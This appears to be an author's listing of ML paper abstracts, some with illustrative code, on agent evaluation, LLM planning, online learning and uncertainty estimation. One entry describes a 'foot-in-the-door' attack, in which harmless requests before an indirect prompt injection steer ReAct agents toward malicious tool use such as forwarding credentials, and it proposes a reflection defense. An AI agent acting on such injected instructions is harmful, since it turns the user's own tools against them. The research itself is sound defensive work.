
Collaborating Authors: Uziel, Guy


Survey on Evaluation of LLM-based Agents

arXiv.org Artificial Intelligence

The emergence of LLM-based agents represents a paradigm shift in AI, enabling autonomous systems to plan, reason, use tools, and maintain memory while interacting with dynamic environments. This paper provides the first comprehensive survey of evaluation methodologies for these increasingly capable agents. We systematically analyze evaluation benchmarks and frameworks across four critical dimensions: (1) fundamental agent capabilities, including planning, tool use, self-reflection, and memory; (2) application-specific benchmarks for web, software engineering, scientific, and conversational agents; (3) benchmarks for generalist agents; and (4) frameworks for evaluating agents. Our analysis reveals emerging trends, including a shift toward more realistic, challenging evaluations with continuously updated benchmarks. We also identify critical gaps that future research must address, particularly in assessing cost-efficiency, safety, and robustness, and in developing fine-grained and scalable evaluation methods. This survey maps the rapidly evolving landscape of agent evaluation, reveals emerging trends in the field, identifies current limitations, and proposes directions for future research.


Breaking ReAct Agents: Foot-in-the-Door Attack Will Get You In

arXiv.org Artificial Intelligence

Following the advancement of large language models (LLMs), the development of LLM-based autonomous agents has become increasingly prevalent. As a result, understanding the security vulnerabilities of these agents has become a critical task. We examine how ReAct agents can be exploited using a straightforward yet effective method we refer to as the foot-in-the-door attack. Our experiments show that indirect prompt injection attacks preceded by harmless, unrelated requests (such as basic calculations) can significantly increase the likelihood of the agent performing subsequent malicious actions. Our results show that once a ReAct agent's thought includes a specific tool or action, the likelihood of executing this tool in subsequent steps increases significantly, as the agent seldom re-evaluates its actions. Consequently, even random, harmless requests can establish a foot-in-the-door, allowing an attacker to embed malicious instructions into the agent's thought process, making it more susceptible to harmful directives. To mitigate this vulnerability, we propose a simple reflection mechanism that prompts the agent to reassess the safety of its actions during execution, which can help reduce the success of such attacks.
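To make the proposed mitigation concrete, here is a minimal sketch of a reflection gate inserted into an agent's execution loop. All names (AgentStep, reflect_on_safety, run_agent) are illustrative assumptions, and the keyword filter stands in for what would be a second LLM call in practice; this is not the paper's implementation.

```python
# Minimal sketch of the reflection mitigation described above.
# AgentStep, reflect_on_safety, and run_agent are illustrative names;
# the keyword filter stands in for an extra LLM call.

from dataclasses import dataclass

@dataclass
class AgentStep:
    thought: str
    action: str        # tool name the agent intends to invoke
    action_input: str

def reflect_on_safety(step: AgentStep, user_goal: str) -> bool:
    """Reassess the pending action at execution time instead of
    trusting the agent's initial thought (which may have been
    seeded by a foot-in-the-door request)."""
    # In practice: an extra LLM call such as
    # "Does executing {action} with {input} serve the goal '{goal}'?"
    banned = ("send_email", "transfer_funds", "delete_files")
    return step.action not in banned

def run_agent(user_goal: str, steps) -> None:
    for step in steps:
        # Reflection gate: every action is re-evaluated before it runs,
        # so an earlier harmless request cannot pre-commit the agent.
        if not reflect_on_safety(step, user_goal):
            print(f"Blocked suspicious action: {step.action}")
            continue
        print(f"Executing {step.action}({step.action_input})")

# Foot-in-the-door sequence: a benign calculation primes the agent,
# then a malicious action rides on the established thought pattern.
run_agent("summarize my inbox", [
    AgentStep("need to compute 2+2", "calculator", "2+2"),
    AgentStep("now forward credentials", "send_email", "attacker@example.com"),
])
```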


What's the Plan? Evaluating and Developing Planning-Aware Techniques for Language Models

arXiv.org Artificial Intelligence

Planning is a fundamental task in artificial intelligence that involves finding a sequence of actions that achieves a specified goal in a given environment. Large language models (LLMs) are increasingly employed in applications that require such planning capabilities, including web and embodied agents. In line with recent studies, we demonstrate experimentally that LLMs lack the skills required for planning. We focus on their ability to function as world models, and show that they struggle to simulate the complex dynamics of classic planning domains. Based on these observations, we advocate a hybrid approach that combines language models with classical planning methodology. We introduce SimPlan, a novel hybrid architecture that utilizes external world-modeling tools and the greedy best-first search algorithm. We assess its effectiveness in a rigorous set of experiments across a variety of challenging planning domains. Our results demonstrate that SimPlan significantly outperforms existing LLM-based planners, highlighting the critical role of search strategies and world models in planning applications.
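The core of such a hybrid planner is an ordinary greedy best-first search driven by an external world model rather than by the LLM's own state predictions. The sketch below shows the search component on a toy domain; the function names and the domain are assumptions for illustration, not the paper's SimPlan code.

```python
# Illustrative greedy best-first search driven by an external world
# model, in the spirit of the hybrid approach described above.

import heapq

def greedy_best_first(start, goal_test, successors, heuristic):
    """Expand the state with the smallest heuristic value first.
    `successors(state)` yields (action, next_state) pairs supplied
    by an external world model rather than by the LLM."""
    frontier = [(heuristic(start), start, [])]
    seen = {start}
    while frontier:
        _, state, plan = heapq.heappop(frontier)
        if goal_test(state):
            return plan
        for action, nxt in successors(state):
            if nxt not in seen:
                seen.add(nxt)
                heapq.heappush(frontier, (heuristic(nxt), nxt, plan + [action]))
    return None  # goal unreachable

# Toy domain: walk along the integer line from 0 to 5.
plan = greedy_best_first(
    start=0,
    goal_test=lambda s: s == 5,
    successors=lambda s: [("+1", s + 1), ("-1", s - 1)],
    heuristic=lambda s: abs(5 - s),
)
print(plan)  # ['+1', '+1', '+1', '+1', '+1']
```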


Nonparametric Online Learning Using Lipschitz Regularized Deep Neural Networks

arXiv.org Machine Learning

In recent years, deep neural networks have been applied to many offline machine learning tasks. Despite their state-of-the-art performance, the theory behind their generalization abilities is still incomplete. In the online domain, even less is known and understood, on both the practical and the theoretical side. Thus, the main focus of this paper is exploring the theoretical guarantees of deep neural networks in online learning under general stochastic processes. In the traditional online learning setting, and in particular in sequential prediction under uncertainty, the learner is evaluated by a loss function that is not entirely known at each iteration [8]. In this work, we study online prediction focusing on the challenging case where the unknown underlying process is stationary and ergodic, thus allowing observations to depend on each other arbitrarily. Many prior works have considered online learning under stationary and ergodic sources in various application domains. For example, in online portfolio selection, [19, 16, 17, 42, 26] proposed nonparametric online strategies that guarantee, under mild conditions, convergence to the best possible outcome.
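As a rough illustration of the setting, the sketch below runs an online learner on a dependent (AR(1), hence stationary and ergodic) stream and adds an input-gradient penalty as a crude proxy for Lipschitz regularization. The architecture, penalty, and data stream are assumptions for illustration only; they do not reproduce the paper's algorithm or its guarantees.

```python
# Hypothetical illustration: one online gradient update per
# observation of a dependent stream, with an input-gradient penalty
# as a proxy for constraining the network's Lipschitz constant.

import torch

torch.manual_seed(0)
net = torch.nn.Sequential(
    torch.nn.Linear(1, 16), torch.nn.Tanh(), torch.nn.Linear(16, 1)
)
opt = torch.optim.SGD(net.parameters(), lr=0.05)
lam = 0.1                     # weight of the Lipschitz penalty
state = torch.zeros(1)        # AR(1) state: observations are dependent

for t in range(200):
    state = 0.9 * state + 0.1 * torch.randn(1)
    x = state.clone().reshape(1, 1).requires_grad_(True)
    y = torch.sin(3 * x).detach()           # stand-in target process
    pred = net(x)
    loss = (pred - y).pow(2).mean()
    # Penalize the input-gradient norm as a proxy for the Lipschitz constant.
    (grad,) = torch.autograd.grad(pred.sum(), x, create_graph=True)
    loss = loss + lam * grad.norm() ** 2
    opt.zero_grad()
    loss.backward()
    opt.step()                # one online update per observation
```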


Deep Online Learning with Stochastic Constraints

arXiv.org Machine Learning

In many real-world applications, one has to consider the minimization of several loss functions simultaneously, which is, in general, impossible. Therefore, one objective is chosen as the primary function to minimize, leaving the others to be bounded by predefined thresholds. For example, in online portfolio selection [5], the ultimate goal is to maximize the wealth of the investor while keeping the risk bounded by a user-defined constant. In Neyman-Pearson (NP) classification (see, e.g., [22]), an extension of classical binary classification, the goal is to learn a classifier achieving low type-II error while keeping its type-I error below a given threshold. Another example is online job scheduling in distributed data centers (see, e.g., [14]), in which a job router receives job tasks and schedules them to different servers. Each server purchases power (within its capacity) from its zone market to serve the assigned jobs. Electricity market prices can vary significantly across time and zones, and the goal is to minimize the electricity cost subject to the constraint that incoming jobs must be served in time. Any training algorithm that handles a single objective loss can, in principle, be adapted to multiple objectives by assigning a positive weight to each loss function. However, choosing these weights is difficult, especially when the constraints must be kept below their thresholds in an online fashion.
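The weighted-combination idea has a standard online primal-dual (Lagrangian) form: take a gradient step on the primary loss plus a multiplier times the constraint loss, then raise the multiplier whenever the constraint is violated. The sketch below illustrates this on a toy quadratic problem; the losses, threshold, and step sizes are assumptions, not the paper's algorithm.

```python
# Hypothetical primal-dual sketch for one stochastic constraint:
# minimize the primary loss while keeping the constraint loss below a
# threshold. Losses, threshold, and step sizes are toy assumptions.

import numpy as np

rng = np.random.default_rng(0)
w = np.zeros(2)          # model parameters
lam = 0.0                # dual variable (Lagrange multiplier)
eta, threshold = 0.1, 0.5

for t in range(1000):
    x = rng.normal(size=2)
    # Primary loss f(w) = (w@x - 1)^2; constraint g(w) = (w@x)^2 - threshold.
    f_grad = 2.0 * (w @ x - 1.0) * x
    g = (w @ x) ** 2 - threshold
    g_grad = 2.0 * (w @ x) * x
    # Primal step on the weighted (Lagrangian) objective f + lam * g ...
    w -= eta * (f_grad + lam * g_grad)
    # ... and dual step: raise lam on violation, project back to lam >= 0.
    lam = max(0.0, lam + eta * g)
```

The dual variable plays exactly the role of the "positive weight" discussed above, except that it is tuned automatically by the observed constraint violations rather than fixed in advance.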


Boosting Uncertainty Estimation for Deep Neural Classifiers

arXiv.org Machine Learning

We consider the problem of uncertainty estimation in the context of (non-Bayesian) deep neural classification. All current methods are based on extracting uncertainty signals from a trained network optimized to solve the classification problem at hand. We demonstrate that such techniques tend to misestimate the uncertainty of instances whose predictions are supposed to be highly confident. This deficiency is an artifact of the training process with SGD-like optimizers. Based on this observation, we develop an uncertainty estimation algorithm that "peels away" highly confident points sequentially and estimates their confidence using earlier snapshots of the trained model, taken before their uncertainty estimates are jittered. We present extensive experiments indicating that the proposed algorithm provides uncertainty estimates that are consistently better than those of the best known methods.
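The peeling idea can be sketched as follows: sort points by the final model's confidence, and re-score the most confident ones using progressively earlier training snapshots. The function below is an illustrative rendering under assumed inputs (per-snapshot max-softmax scores); the peeling schedule and direction are guesses, not the paper's exact procedure.

```python
# Illustrative rendering of the "peeling" idea: re-score the points
# the final model is most confident about using earlier snapshots.

import numpy as np

def peel_confidences(snapshot_probs, peel_frac=0.2):
    """snapshot_probs: per-snapshot arrays of max-softmax confidence
    for the same points, ordered from earliest snapshot to final
    model. Returns one confidence score per point."""
    probs = [np.asarray(p) for p in snapshot_probs]
    conf = probs[-1].copy()              # start from the final model
    remaining = np.argsort(-conf)        # most confident points first
    for snap in reversed(probs[:-1]):    # walk back through snapshots
        n_peel = int(peel_frac * len(remaining))
        if n_peel == 0:
            break
        peeled, remaining = remaining[:n_peel], remaining[n_peel:]
        conf[peeled] = snap[peeled]      # earlier, less "jittered" score
    return conf

early = np.array([0.60, 0.70, 0.90])
final = np.array([0.99, 0.80, 0.95])
print(peel_confidences([early, final], peel_frac=0.5))  # [0.6  0.8  0.95]
```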


Multi-Objective Non-parametric Sequential Prediction

Neural Information Processing Systems

Online-learning research has mainly focused on minimizing a single objective function. In many real-world applications, however, several objective functions have to be considered simultaneously. Recently, an algorithm for dealing with several objective functions in the i.i.d. case was presented. In this paper, we extend the multi-objective framework to the case of stationary and ergodic processes, thus allowing dependencies among observations. We first identify an asymptotic lower bound for any prediction strategy and then present an algorithm whose predictions achieve the optimal solution while fulfilling any continuous and convex constraining criterion.
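A standard device behind such nonparametric strategies is aggregating a countable pool of experts with exponential weights, with constraints handled by projecting the aggregated prediction onto the convex feasible set. The sketch below uses trivial constant experts and an interval constraint purely for illustration; the paper's construction, and its guarantees for stationary ergodic sources, is substantially more involved.

```python
# Toy exponential-weights aggregation over a pool of experts, with the
# constraint enforced by projecting the aggregated prediction onto a
# convex set (here, an interval). Experts, stream, and constraint are
# assumptions for illustration only.

import numpy as np

rng = np.random.default_rng(1)
experts = [lambda hist, c=c: c for c in np.linspace(-1, 1, 9)]  # constant predictors
weights = np.ones(len(experts))
eta = 0.5
history = []

for t in range(500):
    preds = np.array([e(history) for e in experts])
    # Aggregate, then project onto the feasible interval [-0.5, 0.5].
    prediction = float(np.clip(weights @ preds / weights.sum(), -0.5, 0.5))
    y = np.sin(0.1 * t) + 0.1 * rng.normal()    # stand-in observed sequence
    weights *= np.exp(-eta * (preds - y) ** 2)  # exponential weighting by loss
    weights /= weights.sum()                    # normalize for stability
    history.append(y)

print(np.linspace(-1, 1, 9)[np.argmax(weights)])  # currently dominant expert
```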